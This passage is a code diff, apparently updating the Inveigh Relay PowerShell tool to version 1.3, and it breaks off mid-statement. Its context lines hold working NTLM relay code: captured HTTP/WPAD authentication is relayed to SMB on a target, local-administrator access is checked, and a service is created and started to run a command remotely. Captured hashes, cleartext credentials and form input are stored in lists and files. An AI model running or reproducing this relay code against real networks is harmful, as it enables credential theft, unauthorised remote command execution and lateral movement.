[parameter(Mandatory=$false)][Switch]$SMB1, + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0", [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) @@ -188,30 +202,33 @@ if ($invalid_parameter) throw } +$inveigh_version = "1.3" + if($ProxyIP -eq '0.0.0.0') { $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) } -if(!$OutputDir) +if(!$FileOutputDirectory) { $output_directory = $PWD.Path } else { - $output_directory = $OutputDir + $output_directory = $FileOutputDirectory } if(!$inveigh) { $global:inveigh = [HashTable]::Synchronized(@{}) + $inveigh.cleartext_list = New-Object System.Collections.ArrayList + $inveigh.IP_capture_list = New-Object System.Collections.ArrayList $inveigh.log = New-Object System.Collections.ArrayList $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList - $inveigh.cleartext_list = New-Object System.Collections.ArrayList - $inveigh.IP_capture_list = New-Object System.Collections.ArrayList + $inveigh.POST_request_list = New-Object System.Collections.ArrayList $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList $inveigh.valid_host_list = New-Object System.Collections.ArrayList } @@ -224,22 +241,25 @@ if($inveigh.relay_running) if(!$inveigh.running) { + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList $inveigh.console_queue = New-Object System.Collections.ArrayList - $inveigh.status_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.log_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList - $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList - $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList - $inveigh.console_output = $false + $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList + $inveigh.status_queue = New-Object System.Collections.ArrayList $inveigh.console_input = $true + $inveigh.console_output = $false $inveigh.file_output = $false $inveigh.HTTPS_existing_certificate = $false $inveigh.HTTPS_force_certificate_delete = $false + $inveigh.log_output = $true + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" - $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" + $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt" } if($StartupChecks -eq 'Y') @@ -298,6 +318,7 @@ elseif($Tool -eq 2) # PowerShell Empire $inveigh.output_stream_only = $true $inveigh.console_input = $false $inveigh.newline = "`n" + $LogOutput = "N" $ShowHelp = "N" switch ($ConsoleOutput) @@ -328,8 +349,22 @@ else } # Write startup messages -$inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null -$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null +$inveigh.status_queue.Add("Inveigh Relay $inveigh_version started at $(Get-Date -format 's')") > $null + +if($FileOutput -eq 'Y') +{ + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay $inveigh_version started") > $null +} + +if($LogOutput -eq 'Y') +{ + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay started") > $null + $inveigh.log_output = $true +} +else +{ + $inveigh.log_output = $false +} if($firewall_status) { @@ -351,12 +386,10 @@ if($HTTP -eq 'Y') if($HTTP_port_check) { $HTTP = "N" - $inveigh.HTTP = $false $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null } else { - $inveigh.HTTP = $true $inveigh.status_queue.Add("HTTP Capture/Relay = Enabled") > $null if($HTTPIP) @@ -373,7 +406,6 @@ if($HTTP -eq 'Y') } else { - $inveigh.HTTP = $false $inveigh.status_queue.Add("HTTP Capture/Relay = Disabled") > $null } @@ -486,6 +518,17 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null + if($WPADAuth -eq "NTLM") + { + $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()}) + + if($WPADAuthIgnore.Count -gt 0) + { + $inveigh.status_queue.Add("WPAD NTLM Auth Ignored User Agents = " + ($WPADAuthIgnore -join ",")) > $null + } + + } + } if($Proxy -eq 'Y') @@ -659,7 +702,7 @@ $process_ID = $process_ID -replace "-00-00","" # Begin ScriptBlocks -# Shared Basic functions ScriptBlock +# Shared Basic Functions ScriptBlock $shared_basic_functions_scriptblock = { @@ -692,7 +735,7 @@ $shared_basic_functions_scriptblock = } -# Irkin functions ScriptBlock +# Irkin Functions ScriptBlock $irkin_functions_scriptblock = { function ConvertFrom-PacketOrderedDictionary @@ -1430,7 +1473,7 @@ $irkin_functions_scriptblock = } -# SMB NTLM functions ScriptBlock - function for parsing NTLM challenge/response +# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge $SMB_NTLM_functions_scriptblock = { function SMBNTLMChallenge @@ -1498,11 +1541,21 @@ $SMB_relay_challenge_scriptblock = if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03')) { $inveigh.console_queue.Add("SMB relay disabled due to SMB signing requirement on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")]) $SMB_relay_socket.Close() $SMB_client_receive = $null $inveigh.SMB_relay = $false $SMB_client_stage = 'exit' + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target") + } + } } @@ -1611,22 +1664,42 @@ $SMB_relay_response_scriptblock = $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data } - $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_relay_response_stream.Flush() - $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00')) { $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target") + } + } else { $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")]) $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target") $SMB_relay_failed = $true $SMB_relay_socket.Close() + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target") + } + } if(!$SMB_relay_failed) @@ -1709,9 +1782,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'CreateAndXRequest' } @@ -1726,9 +1799,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'RPCBind' } @@ -1745,9 +1818,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'OpenSCManagerW' } @@ -1763,9 +1836,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = $SMB_client_stage_next } @@ -1783,9 +1856,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'CheckAccess' } @@ -1796,11 +1869,20 @@ $SMB_relay_response_scriptblock = if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00') { $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")]) $SMB_service_manager_context_handle = $SMB_client_receive[88..107] $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target") + } + if($SCM_data.Length -lt $SMB_split_index) { $SMB_client_stage = 'CreateServiceW' @@ -1814,8 +1896,18 @@ $SMB_relay_response_scriptblock = elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00') { $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")]) $SMB_relay_failed = $true + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") + } + } else { @@ -1838,9 +1930,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'StartServiceW' } @@ -1861,9 +1953,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) if($SMB_split_stage_final -le 2) { @@ -1893,9 +1985,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) if($SMB_split_stage -ge $SMB_split_stage_final) { @@ -1921,9 +2013,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'StartServiceW' } @@ -1933,8 +2025,21 @@ $SMB_relay_response_scriptblock = if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00') { + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target") + $inveigh.log_file_queue.Add("Trying to execute SMB relay command on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target") + $inveigh.log.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target") + } + $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")]) + $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target") $SMB_service_context_handle = $SMB_client_receive[92..111] $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle @@ -1948,19 +2053,27 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data - $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target") > $null - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("Trying to execute SMB relay command on $Target")]) > $null - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'DeleteServiceW' } elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")]) $SMB_relay_failed = $true + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target") + } + } else { @@ -1975,12 +2088,32 @@ $SMB_relay_response_scriptblock = if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00') { $inveigh.console_queue.Add("SMB relay command executed on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay command executed on $Target") + } + } elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service failed to start on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service failed to start on $Target") + } + } $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID @@ -1995,9 +2128,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'CloseServiceHandle' $SMB_close_service_handle_stage = 1 @@ -2009,9 +2142,19 @@ $SMB_relay_response_scriptblock = if($SMB_close_service_handle_stage -eq 1) { $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")]) $SMB_close_service_handle_stage++ $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target") + } + } else { @@ -2030,9 +2173,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) } 'CloseRequest' @@ -2044,9 +2187,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'TreeDisconnect' } @@ -2059,9 +2202,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'Logoff' } @@ -2074,9 +2217,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'Exit' } @@ -2085,8 +2228,18 @@ $SMB_relay_response_scriptblock = if($SMB_relay_failed) { $inveigh.console_queue.Add("SMB relay failed on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")]) $SMB_client_stage = 'Exit' + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay failed on $Target") + } + } } @@ -2114,9 +2267,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'CreateRequest' } @@ -2134,9 +2287,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'RPCBind' } @@ -2156,9 +2309,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'OpenSCManagerW' } @@ -2177,9 +2330,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00') { @@ -2194,7 +2347,7 @@ $SMB_relay_response_scriptblock = 'StatusPending' { - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00') { @@ -2219,9 +2372,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = 